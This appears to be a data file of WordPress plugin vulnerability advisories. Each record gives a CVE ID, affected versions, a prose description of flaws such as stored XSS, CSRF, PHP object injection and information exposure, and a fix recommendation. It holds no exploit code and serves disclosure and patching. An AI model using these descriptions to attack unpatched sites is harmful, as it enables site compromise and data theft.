{"CVE_ID":"CVE-2024-10545","slug":"nextgen-gallery","versionImpact":"3.59.8","versionEndExcluding":"3.59.9","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.9 does not sanitise and escape some of its Image settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.59.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e969e5f8-17cb-489b-988d-cae31719da36\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e969e5f8-17cb-489b-988d-cae31719da36\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5442","slug":"nextgen-gallery","versionImpact":"3.59.2","versionEndExcluding":"3.59.3","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.59.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f1fa417-f760-4132-95c2-a38d0b631263\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f1fa417-f760-4132-95c2-a38d0b631263\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2744","slug":"nextgen-gallery","versionImpact":"3.59","versionEndExcluding":"3.59.1","description":"The NextGEN Gallery  WordPress plugin before 3.59.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.59.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a5579c15-50ba-4618-95e4-04b2033d721f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a5579c15-50ba-4618-95e4-04b2033d721f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4374","slug":"wp-automatic","versionEndExcluding":"3.53.3","description":"The WordPress Automatic Plugin for WordPress is vulnerable to arbitrary options updates in versions up to, and including, 3.53.2. This is due to missing authorization and option validation in the process_form.php file. This makes it possible for unauthenticated attackers to arbitrarily update the settings of a vulnerable site and ultimately compromise the entire site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0567dc8-7a4c-42f4-bf45-f31a8efaa354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0567dc8-7a4c-42f4-bf45-f31a8efaa354?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-automatic-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-automatic-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13883","slug":"wpupper-share-buttons","versionImpact":"3.51","versionEndExcluding":"3.52","description":"The WPUpper Share Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.51. This is due to missing or incorrect nonce validation on the 'save_custom_css_request' function. This makes it possible for unauthenticated attackers to inject custom CSS to modify a site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpupper-share-buttons\\\/trunk\\\/Controller\\\/ajax.controller.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpupper-share-buttons\\\/trunk\\\/Controller\\\/ajax.controller.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ca55c87-6548-43b8-a23f-d31a51df9533?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ca55c87-6548-43b8-a23f-d31a51df9533?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9540","slug":"sina-extension-for-elementor","versionImpact":"3.5.7","versionEndExcluding":"3.5.8","description":"The Sina Extension for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.7 via the render function in widgets\/advanced\/sina-modal-box.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 3.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8659e1-5880-4738-99ed-e671449c6878?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8659e1-5880-4738-99ed-e671449c6878?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167197\\\/sina-extension-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167197\\\/sina-extension-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4472","slug":"simple-sitemap","versionEndExcluding":"3.5.8","description":"The Simple Sitemap WordPress plugin before 3.5.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b685a12-2ca3-42dd-84fe-4a463a082c2a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b685a12-2ca3-42dd-84fe-4a463a082c2a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4023","slug":"3dprint","versionEndExcluding":"3.5.6.9","description":"The 3DPrint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into submitting a form. Furthermore the created archive has a predictable location and name, allowing the attacker to download the file if they know the time at which the form was submitted, making it possible to leak sensitive files like the WordPress configuration containing database credentials and secrets.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/vulnerabilities-found-in-the-3dprint-premium-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/blog\\\/vulnerabilities-found-in-the-3dprint-premium-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/859c6e7e-2381-4d93-a526-2000b4fb8fee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/859c6e7e-2381-4d93-a526-2000b4fb8fee\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10792","slug":"wpfunnels","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post_id' parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This was partially patched in 3.5.4 and fully patched in 3.5.5.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193046\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193046\\\/wpfunnels\\\/trunk\\\/includes\\\/core\\\/widgets\\\/oxygen\\\/elements\\\/optin\\\/template\\\/template-optin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193046%40wpfunnels&new=3193046%40wpfunnels&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193046%40wpfunnels&new=3193046%40wpfunnels&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9846cb0e-fc68-4a1b-a5a5-63116289c369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9846cb0e-fc68-4a1b-a5a5-63116289c369?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10828","slug":"woo-order-export-lite","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Advanced Order Export For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.5 via deserialization of untrusted input during Order export when the \"Try to convert serialized values\" option is enabled. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c6eed6-7b3f-4b37-85f8-6613527daa54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c6eed6-7b3f-4b37-85f8-6613527daa54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/core\\\/trait-woe-core-extractor.php#L996\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/core\\\/trait-woe-core-extractor.php#L996\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/PHPExcel\\\/Shared\\\/XMLWriter.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/PHPExcel\\\/Shared\\\/XMLWriter.php#L83\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12538","slug":"duplicate-pp","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Duplicate Post, Page and Any Custom Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.3 via the 'dpp_duplicate_as_draft' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-pp\\\/trunk\\\/duplicate-pp.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-pp\\\/trunk\\\/duplicate-pp.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38543ff-1074-4273-be33-8142d59e904f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38543ff-1074-4273-be33-8142d59e904f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5260","slug":"sina-extension-for-elementor","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018read_more_text\u2019 parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da6dcf5c-bb70-4227-a784-55cf28980308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da6dcf5c-bb70-4227-a784-55cf28980308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2067\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2067\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/advanced\\\/sina-blogpost.php?rev=3110446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/advanced\\\/sina-blogpost.php?rev=3110446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/basic\\\/sina-table.php?rev=3110446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/basic\\\/sina-table.php?rev=3110446\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24881","slug":"content-protector","versionEndExcluding":"3.5.5.9","description":"The Passster WordPress plugin before 3.5.5.9 does not properly check for password, as well as that the post to be viewed is public, allowing unauthenticated users to bypass the protection offered by the plugin, and access arbitrary posts (such as private) content, by sending a specifically crafted request.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0967303d-ea49-4993-84eb-a7ec97240071\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0967303d-ea49-4993-84eb-a7ec97240071\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24837","slug":"content-protector","versionEndExcluding":"3.5.5.9","description":"The Passster WordPress plugin before 3.5.5.8 does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fea3ac3-d599-41f3-8f76-08f0d3552af1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fea3ac3-d599-41f3-8f76-08f0d3552af1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5036","slug":"sina-extension-for-elementor","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64f11bc9-88b5-43d5-bc76-129dc5909210?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64f11bc9-88b5-43d5-bc76-129dc5909210?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-counter.php#L687\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-counter.php#L687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104601\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104601\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4953","slug":"elementor","versionEndExcluding":"3.5.5","description":"The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8273357e-f9e1-44bc-8082-8faab838eda7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8273357e-f9e1-44bc-8082-8faab838eda7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/292fc49e0f979bd52d838f0326d1faaebfa59f5e\",\"name\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/292fc49e0f979bd52d838f0326d1faaebfa59f5e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2298","slug":"affiliate-toolkit-starter","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_import_product() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions such as importing products.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1851","slug":"affiliate-toolkit-starter","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_create_list() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions such as creating product lists.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12578","slug":"tickera-event-ticketing-system","versionImpact":"3.5.4.8","versionEndExcluding":"3.5.4.9","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.5.4.8 via the 'tickera_tickets_info' endpoint. This makes it possible for unauthenticated attackers to extract sensitive data from bookings like full names, email addresses, check-in\/out timestamps and more.","recommendation":"Update to version 3.5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201476%40tickera-event-ticketing-system&new=3201476%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201476%40tickera-event-ticketing-system&new=3201476%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10263","slug":"tickera-event-ticketing-system","versionImpact":"3.5.4.4","versionEndExcluding":"3.5.4.6","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.5.4.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.5.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179272\\\/tickera-event-ticketing-system\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179272\\\/tickera-event-ticketing-system\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7495","slug":"wp-members","versionImpact":"3.5.4.1","versionEndExcluding":"3.5.4.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpmem_login_link' shortcode in all versions up to, and including, 3.5.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/api\\\/api.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/api\\\/api.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/class-wp-members-shortcodes.php#L1092\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/class-wp-members-shortcodes.php#L1092\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/vendor\\\/rocketgeek-utilities\\\/includes\\\/utilities.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/vendor\\\/rocketgeek-utilities\\\/includes\\\/utilities.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331571%40wp-members&new=3331571%40wp-members&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331571%40wp-members&new=3331571%40wp-members&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942df4bc-2a17-4add-9664-60d77319b93a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942df4bc-2a17-4add-9664-60d77319b93a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1529","slug":"am-lottieplayer","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded lottie files in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278523\\\/am-lottieplayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278523\\\/am-lottieplayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f44fcc8-c5e0-44f5-92c3-6603b19a06fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f44fcc8-c5e0-44f5-92c3-6603b19a06fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4373","slug":"sina-extension-for-elementor","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Particle Layer widget in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee04b1d-188a-4b92-a6f3-dfa843ca20d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee04b1d-188a-4b92-a6f3-dfa843ca20d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085825%40sina-extension-for-elementor&new=3085825%40sina-extension-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085825%40sina-extension-for-elementor&new=3085825%40sina-extension-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
